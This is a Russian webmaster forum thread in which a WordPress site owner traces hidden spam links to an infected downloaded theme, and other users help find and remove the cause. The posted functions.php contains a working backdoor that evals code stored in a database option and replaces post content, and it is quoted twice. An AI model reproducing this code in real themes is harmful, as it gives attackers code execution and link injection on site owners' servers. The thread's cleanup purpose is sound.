X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Вредоносный код, Помогите найти
anpleshivcev
anpleshivcev
Topic Starter сообщение 21.11.2011, 0:20; Ответить: anpleshivcev
Сообщение #1


Недавно, проверяя сайт на ссылки, обнаружил на некоторых страницах скрытые ссылки с анкором в виде точки. Причем, ссылки видно только незарегистрированным пользователям, поэтому я раньше их не замечал. Вот одна из таких страниц. 7 абзац, точка после первого предложения. Подскажите, пожалуйста, кто знает...
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Genesis
Genesis
сообщение 21.11.2011, 0:57; Ответить: Genesis
Сообщение #2


Мда хитро придумано. Факт взлома на лицо. Бекапов естественно близких нет? Не спец совсем в этом, но по логике для начала нужно определить каким образом внедрен код. Если скриптом, что скорее всего, тут я точно не помощник. А если вручную, то нужно повышать безопасность. Для начала откат на бекап, а дальше книжку в зубы. Посчитайте внешние ссылки и удалите их. Если работает скрипт внедренный они вернутся может не в том кол-ве и не в тех статьях, но вернутся. Для безопасности что сделано вообще? Хостеру о взломе также сообщите.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
anpleshivcev
anpleshivcev
Topic Starter сообщение 21.11.2011, 14:50; Ответить: anpleshivcev
Сообщение #3


Бекапы есть, но и в них то же самое. Я не знаю насколько давно это было сделано. А как определить каим образом был внедрен код? Если вручную, то как я понимаю, ссылка должна крыться в файле именно этой статьи, тогда вопрос: какой файл в вордпресс отвечает именно за содержимое статей. А если скрипт, то он тоже ведь должен быть внедрен в код, а значит и найти его можно. Только я не знаю, как он должен выглядеть и где более вероятней находиться. Хостер сообщил, что взлом произведен не через них, а через FTP. FTP заблокировал, пароль на хосте и сайте поменял - появились новые ссылки. Кто знает, что делать?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Maverick_mw
Maverick_mw
сообщение 23.11.2011, 22:40; Ответить: Maverick_mw
Сообщение #4


Если ссылки добавлены вручную, то сразу ясно что взломали либо админку wordpress, либо доступ phpmyadmin.
Если ссылки добавляются скриптом, то скрипт скорее всего находится в functions.php или single.php - эти файлы лежат в папке с темой сайта
если не ошибаюсь то - /wp-content/themes/название-темы/
Но также есть вариант что добавляются через JS скрипт.
Однозначно надо смотреть те файлы и проверять есть ли лишний код.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
anpleshivcev
anpleshivcev
Topic Starter сообщение 25.11.2011, 10:28; Ответить: anpleshivcev
Сообщение #5


Смотрел - ничего не нашел. Может кто подскажет?
Вот код functions.php:
[php]<?php


add_filter('the_content', '_bloginfo', 100);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
if ( function_exists('register_sidebars') )
register_sidebars(2,array(
'before_widget' => '<div id="%1$s" class="wp-widget %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="wp-widget-title">',
'after_title' => '</div>',
));

function widget_mytheme_search() {
?>
<div class="search-widget-title">Как сделать</div>
<div class="search-widget">
<form method="get" id="searchform" action="<?php bloginfo('home'); ?>/">
<input type="text" name="s" id="s" value="Поиск" onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;"/>
</form>
</div>
<?php
}
if ( function_exists('register_sidebar_widget') )
register_sidebar_widget(__('Search'), 'widget_mytheme_search');
?>[/php]

Вот single.php:
[php]<?php get_header(); ?>

<?php include(TEMPLATEPATH."/left.php");?>
<?php include(TEMPLATEPATH."/right.php");?>
<?php if (have_posts()) : while (have_posts()) : the_post(); ?>
<div class="center-widget-title"></div>
<div class="center-widget">
<div id="post-<?php the_ID(); ?>">

<h1 class="post-title">
<?php the_title(); ?>
</h1>

<p class="postmeta">
<!-- <span class="post-date"><?php the_time('j M, Y') ?></span>&nbsp; -->
<span class="post-filed"><?php the_category(', ') ?></span>
<?php edit_post_link(__('Править'), ' · ', ''); ?>
</p>

<div class="post-content">
<?php the_content('<p class="serif">' . 'Continue Reading...' . '</p>'); ?>

</div> <!-- Post Content -->

<?php link_pages('<p><strong>' . 'Страницы' . ':</strong> ', '</p>', ''); ?>

</div> <!-- post-id -->
</div> <!-- center-widget -->

<?php comments_template(); ?>

<?php endwhile; else: ?>
<div class="center-widget-title"></div>
<div class="center-widget">
<h2>Error 404 - Страница не найдена.</h2>
<p>Извините, но того что Вы искали здесь нет.</p>
</div> <!-- center-widget -->
<?php endif; ?>
<?php get_footer(); ?>[/php]
А если добавили вручную, то как они сделали так, чтобы ссылка была видна только незарегистрированному пользователю?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Maverick_mw
Maverick_mw
сообщение 25.11.2011, 16:41; Ответить: Maverick_mw
Сообщение #6


anpleshivcev, попробуйте удалить следующий код и посмотреть.

[php]add_filter('the_content', '_bloginfo', 100);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}[/php]


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
anpleshivcev
anpleshivcev
Topic Starter сообщение 25.11.2011, 19:15; Ответить: anpleshivcev
Сообщение #7


Спасибо большое! Помогло! Но этот код был изначально в functions.php этой темы. Это получается, что я ее скачал с сайта уже с кодом?
И еще вопрос: что этот код именно делает? После его удаления пароль в админке надо менять?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Maverick_mw
Maverick_mw
сообщение 25.11.2011, 21:35; Ответить: Maverick_mw
Сообщение #8


anpleshivcev, Да, тему вы скачали уже с данным кодом. Пароль желательно сменить для профилактики. Этот код подключает скрипт с другого сайта, в данном случает скрипт безобидный и выводит только ссылку, но ведь мог бы и вирус цеплять на сайт. ;)

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Почистить код на сайте
1 Timka 1090 2.1.2021, 1:13
автор: 0pium
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыВы мне код, я вам как - делать не надо.
0 fedornabilkin 942 18.9.2020, 18:59
автор: fedornabilkin
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыAdobe muse: Не могу разместить нужный мне код сразу после Body
0 Evg82 3829 20.6.2020, 10:24
автор: Evg82
Открытая тема (нет новых ответов) Повесить мой код Адсенса на ваш сайт на 1-2 дня
4 WildWeb8 3699 18.7.2018, 20:04
автор: startseo
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыНужен человек, который почистит код от ненужного мусора. (Вордпресс)
51 timkab_mw 6813 2.8.2017, 12:01
автор: timkab_mw


 



RSS Текстовая версия Сейчас: 29.3.2024, 5:39
Дизайн